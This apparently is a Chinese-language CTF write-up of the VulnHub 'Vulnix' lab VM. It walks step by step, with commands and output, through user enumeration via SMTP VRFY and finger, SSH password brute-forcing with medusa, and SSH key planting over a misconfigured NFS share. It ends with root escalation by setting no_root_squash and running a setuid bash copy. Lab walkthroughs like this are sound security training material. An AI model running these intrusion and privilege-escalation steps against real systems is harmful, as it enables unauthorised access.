vulnhub靶机渗透[HackLAB-Vulnix]

名称

名称：HackLAB: Vulnix
发布日期：2012年9月10日

下载

Vulnix.7z

• Download: http://www.rebootuser.com/wp-content/uploads/vulnix/Vulnix.7z
• Download (Mirror): https://download.vulnhub.com/hacklab/Vulnix.7z
• Download (Torrent): https://download.vulnhub.com/hacklab/Vulnix.7z.torrent

描述

在这里，有一台易受攻击的Linux主机，它具有配置方面的缺陷，而不是有目的的易受攻击的软件版本（无论如何，在发布之时！）该主机基于Ubuntu Server 12.04，并于2012年9月上旬进行了全面修补。详细信息如下：

架构：x86
格式：VMware（vmx＆vmdk）从版本4开始兼容
内存：512MB
网络：NAT
提取大小：820MB
压缩（下载大小）：194MB – 7zip格式– 7zip可从此处获得
MD5 Vulnix哈希值7z：0bf19d11836f72d22f30bf52cd585757
从此处下载Vulnix-

目标;引导，查找IP，破解并获得隐藏在/root中的flag-通过任何想要的方式-不包括对vmdk的实际破解如果有任何问题/意见，请使用下面的评论部分免费联系。

请享用！

资料来源：http://www.rebootuser.com/?p=933

信息收集

上nmap

root@kali:~# nmap -sn -v 192.168.66.*
Nmap scan report for 192.168.66.18
Host is up (0.00018s latency).
MAC Address: 00:0C:29:6C:D6:66 (VMware)

root@kali:~# nmap -sV -v -p- 192.168.66.18
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
25/tcp    open  smtp       Postfix smtpd
79/tcp    open  finger     Linux fingerd
110/tcp   open  pop3?
111/tcp   open  rpcbind    2-4 (RPC #100000)
143/tcp   open  imap       Dovecot imapd
512/tcp   open  exec       netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  tcpwrapped
993/tcp   open  ssl/imaps?
995/tcp   open  ssl/pop3s?
2049/tcp  open  nfs_acl    2-3 (RPC #100227)
39832/tcp open  mountd     1-3 (RPC #100005)
42471/tcp open  status     1 (RPC #100024)
45506/tcp open  nlockmgr   1-4 (RPC #100021)
52840/tcp open  mountd     1-3 (RPC #100005)
53613/tcp open  mountd     1-3 (RPC #100005)

如所见，对于某些用户枚举来说，有一些开放的端口可能很有趣：25（smtp），79（finger）和111（rpcbind）。开始做一些手动尝试来获取端口25（smtp）上的用户：

root@kali:~# telnet 192.168.66.18 25
Trying 192.168.66.18...
Connected to 192.168.66.18.
Escape character is '^]'.
220 vulnix ESMTP Postfix (Ubuntu)
ehlo server
250-vulnix
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
vrfy root
252 2.0.0 root
vrfy admin
550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table
vrfy user
252 2.0.0 user
vrfy administrator
550 5.1.1 <administrator>: Recipient address rejected: User unknown in local recipient table
vrfy vulnix
252 2.0.0 vulnix

在系统上找到3个用户：root，user和vulnix。继续使用finger进行一些研究：

root@kali:~# finger @192.168.66.18
No one logged on.
root@kali:~# finger root@192.168.66.18
Login: root                             Name: root
Directory: /root                        Shell: /bin/bash
Never logged in.
No mail.
No Plan.
root@kali:~# finger user@192.168.66.18
Login: user                             Name: user
Directory: /home/user                   Shell: /bin/bash
Never logged in.
No mail.
No Plan.

Login: dovenull                         Name: Dovecot login user
Directory: /nonexistent                 Shell: /bin/false
Never logged in.
No mail.
No Plan.
root@kali:~# finger vulnix@192.168.66.18
Login: vulnix                           Name: 
Directory: /home/vulnix                 Shell: /bin/bash
Never logged in.
No mail.
No Plan.

有趣的是，该用户用户还具有用于Dovecot的虚拟用户，但没有登录。Dovecot是一个开源电子邮件服务器。这可能是有用的信息。

服务rpcbind已打开。这对于执行一些RPC枚举很有用：

root@kali:~# rpcinfo -p 192.168.66.18
   program vers proto   port  service
    100000    4   tcp    111  portmapper
    100000    3   tcp    111  portmapper
    100000    2   tcp    111  portmapper
    100000    4   udp    111  portmapper
    100000    3   udp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  38458  status
    100024    1   tcp  39760  status
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100227    2   tcp   2049
    100227    3   tcp   2049
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100003    4   udp   2049  nfs
    100227    2   udp   2049
    100227    3   udp   2049
    100021    1   udp  47060  nlockmgr
    100021    3   udp  47060  nlockmgr
    100021    4   udp  47060  nlockmgr
    100021    1   tcp  50245  nlockmgr
    100021    3   tcp  50245  nlockmgr
    100021    4   tcp  50245  nlockmgr
    100005    1   udp  47351  mountd
    100005    1   tcp  50825  mountd
    100005    2   udp  42195  mountd
    100005    2   tcp  55764  mountd
    100005    3   udp  38349  mountd
    100005    3   tcp  38329  mountd

现在确定NFS正在侦听端口2049/tcp和2049/udp。现在是时候进行一些NFS枚举了：

root@kali:~# showmount -e 192.168.66.18
Export list for 192.168.66.18:
/home/vulnix *

这意味着可以从任何主机访问共享。因此将该共享的位置安装在本地计算机上：

root@kali:~/vulnhub/vulnix# mount 192.168.66.18:/home/vulnix /root/vulnhub/vulnix
root@kali:~/vulnhub# cd vulnix
bash: cd: vulnix: 权限不够

但是当尝试访问该文件夹时，检索到拒绝访问。尝试更改访问权限，但检索到相同的错误。认为root squashing已启用，因为去过由该VM的创建者开办的培训课程，经常提到要使其保持启用状态。

getshell

至此，决定暴力破解已检索用户的密码。创建一个文件，收集所有用户（没有用户dovenull，没有登录访问权限）：

root@kali:~/vulnhub/vulnix# cat user.txt 
root
user
vulnix

然后使用字典列表rockyou.txt破解密码：

root@kali:~/vulnhub/vulnix# medusa -h 192.168.66.18 -U user.txt -P /usr/share/wordlists/rockyou.txt -e ns -f -M ssh -t 64

终于破解了用户user的密码，即letmein。

root@kali:~# ssh user@192.168.66.18
The authenticity of host '192.168.66.18 (192.168.66.18)' can't be established.
ECDSA key fingerprint is SHA256:IGOuLMZRTuUvY58a8TN+ef/1zyRCAHk0qYP4wMViOAg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.66.18' (ECDSA) to the list of known hosts.
Enter passphrase for key '/root/.ssh/id_rsa': 
user@192.168.66.18's password: 
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Thu Apr 16 03:53:37 BST 2020

  System load:  0.0              Processes:           89
  Usage of /:   90.2% of 773MB   Users logged in:     0
  Memory usage: 7%               IP address for eth0: 192.168.66.18
  Swap usage:   0%

  => / is using 90.2% of 773MB                                                                                                        
                                                                                                                                      
  Graph this data and manage this system at https://landscape.canonical.com/

user@vulnix:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),100(users)
user@vulnix:~$ whoami
user
user@vulnix:~$ pwd
/home/user
user@vulnix:~$ uname -a
Linux vulnix 3.2.0-29-generic-pae #46-Ubuntu SMP Fri Jul 27 17:25:43 UTC 2012 i686 i686 i386 GNU/Linux

当然，该用户不是sudoer。

ssh key毒化以getshell

不得已时尝试以vulnix用户身份登录。

检查受害服务器上的/etc/passwd文件，发现用户vulnix具有UID 2008，因此在本地计算机上创建了一个名为vulnix的用户，UID为2008，然后尝试再次访问该分区：

user@vulnix:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
postfix:x:104:110::/var/spool/postfix:/bin/false
dovecot:x:105:112:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:106:65534:Dovecot login user,,,:/nonexistent:/bin/false
landscape:x:107:113::/var/lib/landscape:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
vulnix:x:2008:2008::/home/vulnix:/bin/bash
statd:x:109:65534::/var/lib/nfs:/bin/false

使用新创建的vulnix用户（具有UID 2008权限）成功进入已经挂载的/mnt/vulnix文件夹

root@kali:~# useradd vulnix
root@kali:~# passwd vulnix
新的 密码：
重新输入新的 密码：
passwd：已成功更新密码
root@kali:~# leafpad /etc/passwd
root@kali:~# su vulnix
$ ls
android-backup-recover.jar  ctf               go                  Linux_Exploit_Suggester.pl  proxychains-ng  TheFatRat
ant                         Desktop           gobackdoor          linuxprivchecker.py         pwndbg          translatefiles
antshells                   dirmap            gobackdoor.go       linux-sendpage3             pycdc           trojan
antsword                    dirsearch         HiddenEye           location                    safedog2.py     uncompyle2
BlindWaterMark              Downloads         historyvulnhub      Lucifer113.ovpn             safedog.py      vulnhub
burpextend                  dvcs-ripper       hsdecomp            lxd-alpine-builder          shells          WAFNinja
cansina                     Fatrat_Generated  knock-knock-master  picture                     SocialFish
checkifbase64.py            GitHack           LinEnum.sh          pkcrack                     struts-pwn
$ id
uid=2008(vulnix) gid=2008 组=2008
$ pwd
/root
$ cd /mnt/vulnix
$ ls
$ pwd
/mnt/vulnix
$ whoami
vulnix
$ id
uid=2008(vulnix) gid=2008 组=2008
$ ls -la
总用量 20
drwxr-x--- 2 nobody 4294967294 4096 9月   2  2012 .
drwxr-xr-x 3 root   root       4096 4月  15 23:00 ..
-rw-r--r-- 1 nobody 4294967294  220 4月   3  2012 .bash_logout
-rw-r--r-- 1 nobody 4294967294 3486 4月   3  2012 .bashrc
-rw-r--r-- 1 nobody 4294967294  675 4月   3  2012 .profile

已经进入，生成一个SSH密钥，以vulnix用户身份登录而不需要密码：

root@kali:~/vulnhub/vulnix# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /root/vulnhub/vulnix/id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/vulnhub/vulnix/id_rsa
Your public key has been saved in /root/vulnhub/vulnix/id_rsa.pub
The key fingerprint is:
SHA256:spDzqP71ppmCK9Ls2eSA+m1TFlI8Rs5xptB4isWBn7M root@kali
The key's randomart image is:
+---[RSA 3072]----+
|   oo*o o        |
|  . ++B=         |
|   + *+.         |
|  . *..          |
|    ++..S        |
| .  E=oo         |
|.o..oo+          |
|+ +O+. +.        |
|o=B+=o+o.        |
+----[SHA256]-----+
root@kali:~/vulnhub/vulnix# ls
id_rsa  id_rsa.pub  user.txt
root@kali:~/vulnhub/vulnix# cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
vU05iNf3ixaredAAAACXJvb3RAa2FsaQE=
-----END OPENSSH PRIVATE KEY-----
root@kali:~/vulnhub/vulnix# cat id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDetmdQqLfvlrWOcE1pjVqlFGyWzJ/5gbyYysYpycTAMYRdwpp7KdrN1ewEM9//RXaRAD1dg8Eb5D+mlzqGXgGmYOL5JsQMfkpJfZI/I43Wp5gAC72R/BLHwc7FZI9Rh488I6e6rFwEDaIghKyZKrXRBHuYxKIAOqkYWMzQL/bY2Ett0RfhZKwk9s4lWEkUuf1UK1UaksL+DcK7cJgnkS24B+8BhzC+CMmNbRFvsS6/uewFpNV9wVaQJ8/MWBcbN2Gcs5Es8iDb2XQ2seTFNuHRx82lxStJE7zFJRQXwAIzE5tu5VyPNuldfyutNrF6YTz28VUbrMtHERfQWTbUQdz8Ix9iPtGsdhR6Trz0poooZ9L9fl01AjAnSR9H/OTPkvVauR6asz7Ak9qbF5yQsMQZVN2DUeYg7BWwWkpX9CIBCKM+cJB9rV/Zu5DE45KVrasPzRsZgg+Unb9l1hH8aLMz7pASv5dwJPNZgOwpPY1g75lUJE6DFNHYLIu5jgdv4zs= root@kali

然后在终端上以’vulnix’用户身份将生成的ssh-key复制到’/home/vulnix/.ssh/authorized_keys’文件中：

$ mkdir .ssh
$ cd .ssh
$ pwd
/mnt/vulnix/.ssh
$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDetmdQqLfvlrWOcE1pjVqlFGyWzJ/5gbyYysYpycTAMYRdwpp7KdrN1ewEM9//RXaRAD1dg8Eb5D+mlzqGXgGmYOL5JsQMfkpJfZI/I43Wp5gAC72R/BLHwc7FZI9Rh488I6e6rFwEDaIghKyZKrXRBHuYxKIAOqkYWMzQL/bY2Ett0RfhZKwk9s4lWEkUuf1UK1UaksL+DcK7cJgnkS24B+8BhzC+CMmNbRFvsS6/uewFpNV9wVaQJ8/MWBcbN2Gcs5Es8iDb2XQ2seTFNuHRx82lxStJE7zFJRQXwAIzE5tu5VyPNuldfyutNrF6YTz28VUbrMtHERfQWTbUQdz8Ix9iPtGsdhR6Trz0poooZ9L9fl01AjAnSR9H/OTPkvVauR6asz7Ak9qbF5yQsMQZVN2DUeYg7BWwWkpX9CIBCKM+cJB9rV/Zu5DE45KVrasPzRsZgg+Unb9l1hH8aLMz7pASv5dwJPNZgOwpPY1g75lUJE6DFNHYLIu5jgdv4zs= root@kali" > authorized_keys
$ ls
authorized_keys

然后使用ssh私匙登录

root@kali:~/vulnhub/vulnix# ssh vulnix@192.168.66.18 -i id_rsa
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Thu Apr 16 04:23:19 BST 2020

  System load:  0.0              Processes:           92
  Usage of /:   90.2% of 773MB   Users logged in:     1
  Memory usage: 9%               IP address for eth0: 192.168.66.18
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/

New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

vulnix@vulnix:~$ id
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix)
vulnix@vulnix:~$ whoami
vulnix
vulnix@vulnix:~$ pwd
/home/vulnix

提权

vulnix@vulnix:~$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User vulnix may run the following commands on this host:
    (root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports

很好,vulnix可以运行命令来打开/etc/exports，不用输入密码。这是发现的：

vulnix@vulnix:~$ sudoedit /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix    *(rw,root_squash)

还记得之前说过的有关Root squashing的内容吗？（感谢课程，Owen xD）

用no_root_squash替换了root_squash flag。需要作弊，因为没有vulnix的密码，而且没有sudo用户执行命令/usr/sbin/exportfs -a或计算机重新引导，就无法再次导出NFS分区，所以手动重新引导（Boooooo，真是个n0o0o0o0ob !!）

• root_squash： 客户端的root用户映射到任何人：客户端无法使用setuid位将恶意软件留给他人执行。
• no_root_squash：通过此选项，停用了此安全功能，从而允许客户端的root权限操作最终以root身份出现在导出的文件系统中（因此，在其余客户端中）。

机器重新启动后，再次安装该分区并以本地root用户身份访问。

检查机器是否再次启动（再次抱歉！）：

root@kali:~# ping -c 4 192.168.66.18
PING 192.168.66.18 (192.168.66.18) 56(84) bytes of data.
64 bytes from 192.168.66.18: icmp_seq=1 ttl=64 time=1.04 ms
64 bytes from 192.168.66.18: icmp_seq=2 ttl=64 time=0.279 ms
64 bytes from 192.168.66.18: icmp_seq=3 ttl=64 time=0.482 ms
64 bytes from 192.168.66.18: icmp_seq=4 ttl=64 time=0.492 ms

--- 192.168.66.18 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3033ms
rtt min/avg/max/mdev = 0.279/0.572/1.037/0.281 ms

然后再次挂载分区：

root@kali:~# mount 192.168.66.18:/home/vulnix /mnt/vulnix
root@kali:~# cd /mnt/vulnix
root@kali:/mnt/vulnix# ls
local_shell

挂载后，获得了受害者计算机本地shell的副本，并将所有权和SID更改为root：

在受害者的机器上，如“vulnix”：

vulnix@vulnix:~$ cp /bin/bash local_shell
vulnix@vulnix:~$ ls
local_shell

在本地计算机上，以root身份：

root@kali:/mnt/vulnix# cat local_shell > spawn_root_shell
root@kali:/mnt/vulnix# ls
local_shell  spawn_root_shell
root@kali:/mnt/vulnix# chmod 4777 *
root@kali:/mnt/vulnix# ls -la
总用量 1828
drwxr-x--- 4 vulnix vulnix   4096 4月  16 02:33 .
drwxr-xr-x 3 root   root     4096 4月  15 23:00 ..
-rw------- 1 vulnix vulnix      0 4月  16 02:27 .bash_history
-rw-r--r-- 1 vulnix vulnix    220 4月   3  2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix   3486 4月   3  2012 .bashrc
drwx------ 2 vulnix vulnix   4096 4月  15 23:23 .cache
-rwsrwxrwx 1 vulnix vulnix 920788 4月  16 02:24 local_shell
-rw-r--r-- 1 vulnix vulnix    675 4月   3  2012 .profile
-rwsrwxrwx 1 root   root   920788 4月  16 02:33 spawn_root_shell
drwxr-xr-x 2 vulnix vulnix   4096 4月  15 23:21 .ssh

然后在受害人的机器上执行shell，并保留带有flag -p的原始文件的权限：

vulnix@vulnix:~$ ls -la
total 1828
drwxr-x--- 4 vulnix vulnix   4096 Apr 16 07:33 .
drwxr-xr-x 4 root   root     4096 Sep  2  2012 ..
-rw------- 1 vulnix vulnix      0 Apr 16 07:27 .bash_history
-rw-r--r-- 1 vulnix vulnix    220 Apr  3  2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix   3486 Apr  3  2012 .bashrc
drwx------ 2 vulnix vulnix   4096 Apr 16 04:23 .cache
-rwsrwxrwx 1 vulnix vulnix 920788 Apr 16 07:24 local_shell
-rw-r--r-- 1 vulnix vulnix    675 Apr  3  2012 .profile
-rwsrwxrwx 1 root   root   920788 Apr 16 07:33 spawn_root_shell
drwxr-xr-x 2 vulnix vulnix   4096 Apr 16 04:21 .ssh
vulnix@vulnix:~$ ./spawn_root_shell -p
spawn_root_shell-4.2# id
uid=2008(vulnix) gid=2008(vulnix) euid=0(root) groups=0(root),2008(vulnix)
spawn_root_shell-4.2# whoami
root
spawn_root_shell-4.2# cd /root
spawn_root_shell-4.2# ls
trophy.txt
spawn_root_shell-4.2# cat trophy.txt
cc614640424f5bd60ce5d5264899c3be

• 

知识点总结

• 通过telnet连接收集用户名敏感信息
• finger查看用户登录信息
• 使用rpcinfo进行RPC枚举
• 使用showmount进行NFS枚举
• hydra爆破ssh密码
• ssh key毒化攻击getshell
• 特定linux UID权限用户登录挂载的NFS分区
• 使用ssh私匙登录ssh
• 用no_root_squash替换root_squash以停用安全功能，从而允许客户端的root权限操作最终使文件以root身份出现在导出的文件系统中（在其余客户端中）
• 客户端本地以root身份运行cat命令拷贝shell文件，并chmod 4777赋予权限，最后执行shell文件加上-p参数提权

Game over

不好意思，这次还是没有找到希腊某位大佬的傻瓜式一键通关脚本，i am so sorry about this…It’s a pity…

The end,to be continue…